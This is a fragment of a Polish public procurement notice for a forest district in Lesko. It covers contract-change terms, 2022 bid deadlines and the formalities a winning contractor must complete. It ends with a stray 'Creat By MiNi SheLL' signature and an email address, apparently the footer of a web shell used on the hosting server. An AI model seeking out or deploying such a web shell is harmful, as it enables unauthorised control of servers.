Wykonawca<br/>poniósł w związku z wynikającymi z umowy planowanymi świadczeniami.<br/>4. Wszystkie powyższe postanowienia stanowią katalog zmian, na które Zamawiający może<br/>wyrazić zgodę. Nie stanowią jednocześnie zobowiązania do wyrażenia takiej zgody.<br/>5. Nie stanowi zmiany umowy:<br/>1) zmiana danych związanych z obsługą administracyjno-organizacyjną Umowy (np. zmiana nr<br/>rachunku bankowego)<br/>2) zmiany danych teleadresowych, zmiany osób wskazanych do kontaktów miedzy Stronami <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-06-27 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">ofertę wraz z wymaganymi dokumentami należy umieścić na Platformie pod adresem : https://platformazakupowa.pl/pn/lasy_lesko</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-06-27 10:15</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Do formalności, jakie powinny zostać dopełnione przez Wykonawcę, którego ofertę wybrano, w<br/>celu zawarcia umowy (w formie pisemnej, pod rygorem nieważności) należą:1) wskazanie osób umocowanych do zawarcia umowy oraz złożenie oryginałów pełnomocnictw lub poświadczonych<br/>notarialnie za zgodność z oryginałem kopii pełnomocnictw, lub<br/>sporządzonych przez notariusza odpisów, lub wyciągów z pełnomocnictw, lub kopii<br/>pełnomocnictw poświadczonych za zgodność z oryginałem przez mocodawcę – o ile do<br/>zawarcia umowy przez wskazaną osobę wymagane będzie pełnomocnictwo;<br/>2) wyliczenie kwoty oraz wniesienie zabezpieczenia należytego wykonania umowy, przy czym<br/>jeżeli Wykonawca wnosi zabezpieczenie w innej formie niż pieniądz, będzie zobowiązany<br/>wcześniej uzgodnić treść dokumentu zabezpieczenia należytego wykonania umowy z<br/>Zamawiającym, celem zapewnienia zgodności tego dokumentu z wymogami określonymi w<br/>ustawie Pzp. Zamawiający zastrzega możliwość uznania przedłożonej formy zabezpieczenia za<br/>nieodpowiadającą jego wymogom, a jeżeli Wykonawca nie uzupełni dokumentu zabezpieczenia<br/>zgodnie z wymogami Zamawiającego, Zamawiający będzie mógł uznać, że Wykonawca uchyla<br/>się od zawarcia umowy;<br/>3) przedstawienie Zamawiającemu dokumentów poświadczających posiadanie przez wskazane<br/>osoby wymaganych kwalifikacji i uprawnień - dotyczy osoby pełniącej funkcję kierownika<br/>budowy;<br/>4) dostarczenie Zamawiającemu potwierdzonej za zgodność z oryginałem kopii umowy<br/>regulującej współpracę podmiotów składających wspólną ofertę – dotyczy Wykonawców, którzy<br/>wspólnie uzyskali zamówienie;<br/>5) przedłożenie Zamawiającemu umów o pracę osób wykonujących czynności związane z<br/>zamówieniem. Kopia umowy/umów powinna zostać zanonimizowana w sposób zapewniający<br/>ochronę danych osobowych pracowników/zleceniobiorców, zgodnie z przepisami o ochronie<br/>danych osobowych, przy czym imię i nazwisko pracownika nie podlega anonimizacji, a także<br/>informacje takie jak data zawarcia umowy, rodzaj umowy o pracę i wymiar etatu powinny być<br/>możliwe do zidentyfikowania;<br/>6) przedłożenie Zamawiającemu dokumentu potwierdzającego posiadanie ubezpieczenia od<br/>odpowiedzialności cywilnej określonej we wzorze umowy w sprawie zamówienia publicznego<br/>(załącznik nr 10 do SWZ);7) w przypadku wygrania przetargu Wykonawcy składający ofertę wspólną będą mieli obowiązek<br/>przedłożyć Zamawiającemu umowę regulującą ich współpracę – tzw. konsorcjum (list<br/>intencyjny), zawierający, co najmniej: zobowiązanie do realizacji wspólnego przedsięwzięcia<br/>gospodarczego obejmującego swoim zakresem realizację przedmiotu zamówienia, określenie<br/>zakresu działania poszczególnych stron umowy, czas obowiązywania umowy, który nie może<br/>być krótszy, niż okres realizacji robót budowlanych;<br/>8) przedłożenie Zamawiającemu projektu umowy, jaką Wykonawca zamierza zawrzeć z<br/>podwykonawcą celem jej akceptacji – jeżeli Wykonawca wskazał w ofercie, że część<br/>zamówienia zostanie powierzona podwykonawcy;9) przedłożenie Zamawiającemu dokumentów<br/>wskazanych w § 4 ust. 2 pkt 2 Umowy,<br/>stanowiącej załącznik nr 10 do SWZ (wzoru umowy) oraz oświadczenie dotyczące osób<br/>wykonujących czynności wchodzące w skład przedmiotu zamówienia zatrudnionych na postawie<br/>umowy o pracę w sposób określony w art. 22 § 1 ustawy z dnia 26 czerwca 1974 r. - Kodeks<br/>pracy (t.j.: Dz.U. z 2020 r. poz. 1320, ze zm.).<br/>Niedopełnienie wskazanych formalności będzie traktowane jako uchylanie się przez<br/>Wykonawcę od zawarcia umowy w sprawie zamówienia publicznego.<br/>Pouczenie o środkach ochrony prawnej - par.20. SWZ<br/>Informacja o COVID-19 -- par.24 SWZ

Creat By MiNi SheLL
Email: jattceo@gmail.com